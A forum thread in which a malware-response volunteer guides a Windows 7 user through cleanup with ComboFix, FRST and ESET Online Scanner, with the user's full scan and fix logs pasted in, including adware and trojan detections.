[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.14"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\McAfee]
"SymbolicLinkValue"=hex(6):5c,00,72,00,65,00,67,00,69,00,73,00,74,00,72,00,79,
   00,5c,00,6d,00,61,00,63,00,68,00,69,00,6e,00,65,00,5c,00,53,00,6f,00,66,00,\
.
Completion time: 2014-07-17  09:58:35
ComboFix-quarantined-files.txt  2014-07-17 13:58
ComboFix2.txt  2014-07-17 02:08
.
Pre-Run: 288,317,480,960 bytes free
Post-Run: 288,296,718,336 bytes free
.
- - End Of File - - 39968946DE27DF415313168748D38DFB
A36C5E4F47E84449FF07ED3517B43A31
 



#8 aharonov

  • Malware Response Team

Posted 17 July 2014 - 09:49 AM

The 'Surrogates' went away immediately. I have never seen this behavior before. Somewhere during the run the task manager went away too.
I assume ComboFix was killing these tasks.

That's right. ComboFix is killing processes to minimize possible interference of the malware in the cleanup. This is its normal behavior. But thank you for reporting what you've observed. Detailed feedback can only help.

Let's give FRST a shot.
This time make sure that these zombified instances of dllhost.exe are not running (e.g. unplug from network and kill them in Task Manager) and then run the following FRST fix:

Please download the attached fixlist.txt and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


#9 scooter2028

Posted 17 July 2014 - 03:10 PM

Here is the FRST log.  It was run as specified.

 

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 15-07-2014 01
Ran by Ric at 2014-07-17 15:47:08 Run:2
Running from C:\Users\Ric\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
DeleteKey: HKU\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
2014-06-25 19:50 - 2014-07-06 13:39 - 00000000 ____D () C:\ProgramData\IculOnse
2014-06-25 19:54 - 2014-06-25 20:02 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Feeqvena
HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\Software\Classes\.exe: exefile =>  <===== ATTENTION!
HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\Software\Classes\exefile:  <===== ATTENTION!
AlternateDataStreams: C:\Users\Ric\Local Settings:eze3UMfrJWx7rnYl4ZabQcSdDo9
AlternateDataStreams: C:\Users\Ric\AppData\Local:eze3UMfrJWx7rnYl4ZabQcSdDo9
AlternateDataStreams: C:\Users\Ric\AppData\Local\Application Data:eze3UMfrJWx7rnYl4ZabQcSdDo9
AlternateDataStreams: C:\Users\Ric\AppData\Local\QX98MGlBll:ICLtGXGuvbHk9JsjsurofG6fTog
AlternateDataStreams: C:\Users\Ric\AppData\Local\Temp:u7mOtr3DxOBSIqOEV
REG: reg query "HKU\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" /s
Reboot:
*****************

HKU\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} => Key Deleted Successfully.
C:\ProgramData\IculOnse => Moved successfully.
C:\Users\Ric\AppData\Roaming\Feeqvena => Moved successfully.
'HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\Software\Classes\.exe'=> Key not found.
'HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\Software\Classes\exefile' => Key deleted successfully.
"C:\Users\Ric\Local Settings" => ":eze3UMfrJWx7rnYl4ZabQcSdDo9" ADS not found.
C:\Users\Ric\AppData\Local => ":eze3UMfrJWx7rnYl4ZabQcSdDo9" ADS removed successfully.
"C:\Users\Ric\AppData\Local\Application Data" => ":eze3UMfrJWx7rnYl4ZabQcSdDo9" ADS not found.
C:\Users\Ric\AppData\Local\QX98MGlBll => ":ICLtGXGuvbHk9JsjsurofG6fTog" ADS removed successfully.
C:\Users\Ric\AppData\Local\Temp => ":u7mOtr3DxOBSIqOEV" ADS removed successfully.

========= reg query "HKU\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" /s =========

ERROR: The system was unable to find the specified registry key or value.

========= End of Reg: =========

 

The system needed a reboot.

==== End of Fixlog ====



#10 aharonov

Posted 17 July 2014 - 03:28 PM

Hi,

this looks good. How is your computer running now after the reboot? Are there still those zombified dllhost.exe instances or have they vanished?
Let's do a check up:


Step 1

Please download the ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start esetsmartinstaller_enu.exe with administrator privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log file is created at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!



Step 2

Start FRST with administrator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#11 scooter2028

Posted 17 July 2014 - 09:17 PM

They've apparently moved the location of some of the run parameters:

 

- The 'Remove found threats' is in the 'Advanced Settings'. - I unchecked it.

- 'Scan Archives' is in the Advanced settings - I checked it.

- 'Scan for potentially unwanted applications' is not in the Advanced Section but before it and has 2 radio buttons.  1 to Enable & 1 to disable.  I enabled.

- 'Enable  Anti-Stealth technology' - checked in Advance as specified.

So I ran the scan with specifications as you requested.

 

Very optimistic. The dllhost.exe procs are gone - but I've spoken too soon before. Before my very first post, I prematurely proclaimed success only to have them start up again. However - they sometimes might wait 5 to 10 minutes to start up, but now it's been about 5 hours with no trace.
 

ESET log here:

 

 

C:\AdwCleaner\Quarantine\C\Program Files (x86)\centurytoolbar\centurytoolbarDx.dll.vir a variant of Win32/Toolbar.Visicom.B potentially unwanted application
C:\AdwCleaner\Quarantine\C\Program Files (x86)\centurytoolbar\centurytoolbartb.dll.vir a variant of Win32/Toolbar.Visicom.A potentially unwanted application
C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Temp\scoped_dir_16121\DealPly.crx Win32/DealPly.J potentially unwanted application
C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Temp\scoped_dir_16121\CRX_INSTALL\background.html Win32/DealPly.J potentially unwanted application
C:\Users\Ric\AppData\Local\UQmedia\msolui80.dll Win32/Boaxxe.BE trojan
C:\Users\Ric\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27\23684b1b-3ec5b6ac multiple threats
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\genfix2-a[1] Win32/Toolbar.Zugo.D potentially unwanted application
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\search-update2[1] a variant of Win32/Distromatic.C potentially unwanted application
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M\genfix-e[1] Win32/Toolbar.Zugo.D potentially unwanted application
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M\search-update-d[1] Win32/Toolbar.Zugo.D potentially unwanted application
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M\updater-startnow-200-2.5-d[1].exe a variant of Win32/Toolbar.Zugo potentially unwanted application
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\genfix2-a[1] Win32/Toolbar.Zugo.D potentially unwanted application
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\search-update2[1] a variant of Win32/Distromatic.C potentially unwanted application
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M\genfix-e[1] Win32/Toolbar.Zugo.D potentially unwanted application
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M\search-update-d[1] Win32/Toolbar.Zugo.D potentially unwanted application
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M\updater-startnow-200-2.5-d[1].exe a variant of Win32/Toolbar.Zugo potentially unwanted application
 



#12 scooter2028

Posted 17 July 2014 - 09:20 PM

Forgot step 2 - running now.



#13 scooter2028

Posted 17 July 2014 - 09:22 PM

STEP 2

 

FRST log

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 15-07-2014 01
Ran by Ric (administrator) on DELL-XPS-1645 on 17-07-2014 22:20:55
Running from C:\Users\Ric\Desktop
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\stacsv64.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Carbonite, Inc. (www.carbonite.com)) C:\Program Files\Carbonite\Carbonite Backup\CarboniteService.exe
() C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe
(Cyberlink) C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\CLML_NTService\CLMLServer.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(PC Pitstop LLC) C:\Program Files (x86)\PCPitstop\PCPitstopScheduleService.exe
(QUALCOMM, Inc.) C:\Program Files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe
(Dropbox, Inc.) C:\Users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
() C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe

==================== Registry (Whitelisted) ==================

HKU\.DEFAULT\...\RunOnce: [{90140000-003D-0000-1000-0000000FF1CE}] - C:\Windows\system32\cmd.exe /C del "C:\ProgramData\Microsoft Help\Rgstrtn.lck" /Q /A:H
Startup: C:\Users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Green -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Partial -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Yellow -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: DropboxExt1 -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: DropboxExt2 -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: DropboxExt3 -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: DropboxExt4 -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: Carbonite.Green -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: Carbonite.Partial -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: Carbonite.Yellow -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: DropboxExt1 -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: DropboxExt2 -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: DropboxExt3 -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x9EFC09E253D5CB01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - DefaultScope value is missing.
SearchScopes: HKCU - DefaultScope {4C57D5F1-EA69-4478-82D3-94C509422F49} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKCU - {4C57D5F1-EA69-4478-82D3-94C509422F49} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKCU - {A3F26D1D-B8BE-4F06-BAE2-B3A52A885078} URL = http://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
SearchScopes: HKCU - {DECA3892-BA8F-44b8-A993-A466AD694AE4} URL = http://search.yahoo.com/search?p={searchTerms}&fr=chr-offrhap
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: ContributeBHO Class -> {074C1DC5-9320-4A9A-947D-C042949C6216} -> C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll (Adobe Systems, Inc.)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Toolbar: HKLM-x32 - Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll (Adobe Systems, Inc.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
DPF: HKLM {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} https://support.dell.com/systemprofiler/SysProExe.CAB
DPF: HKLM-x32 {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} https://support.dell.com/systemprofiler/SysProExe.CAB
DPF: HKLM-x32 {C1F8FC10-E5DB-4112-9DBF-6C3FF728D4E3} http://support.dell.com/systemprofiler/DellSystemLite.CAB
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/WBXclient-T28L10NSP12_CP1-16851/webex/ieatgpc1.cab
DPF: HKLM-x32 {FFB3A759-98B1-446F-BDA9-909C6EB18CC7} http://utilities.pcpitstop.com/Optimize3/pcpitstop2.dll
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.3.26 205.171.2.26

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll ()
FF Plugin: @microsoft.com/GENUINE - C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @canon.com/EPPEX - C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll (CANON INC.)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/JavaPlugin - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE - C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin - C:\Users\Ric\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin - C:\Users\Ric\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Users\Ric\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Users\Ric\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: amazon.com/AmazonMP3DownloaderPlugin - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin10171.dll (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Ric\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Ric\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\aolsearch.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\McSiteAdvisor.xml
FF HKLM-x32\...\Firefox\Extensions: [{01A8CA0A-4C96-465b-A49B-65C46FAD54F9}] - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\FirefoxPlugin\{01A8CA0A-4C96-465b-A49B-65C46FAD54F9}
FF Extension: Adobe Contribute Toolbar - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\FirefoxPlugin\{01A8CA0A-4C96-465b-A49B-65C46FAD54F9} [2011-02-26]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome:
=======
CHR HomePage: hxxp://www.msn.com/?pc=BDT3&ocid=BDT3DHP&dt=101013
CHR StartupUrls: "hxxp://www.msn.com/?pc=BDT3&ocid=BDT3DHP&dt=101013", "hxxp://search.startnow.com/?src=startpage&provider=&provider_name=startnow&provider_code=&partner_id=999&product_id=10&affiliate_id=&channel=&toolbar_id=&toolbar_version=&install_country=&install_date=20140228&user_guid=F7245D26E1254072935314207A495284&machine_id=3b988bf6eb0c494be4e168f8f978bb6b&browser=cr&os=win&os_version=6.1-x64-SP1", "hxxp://blank/"
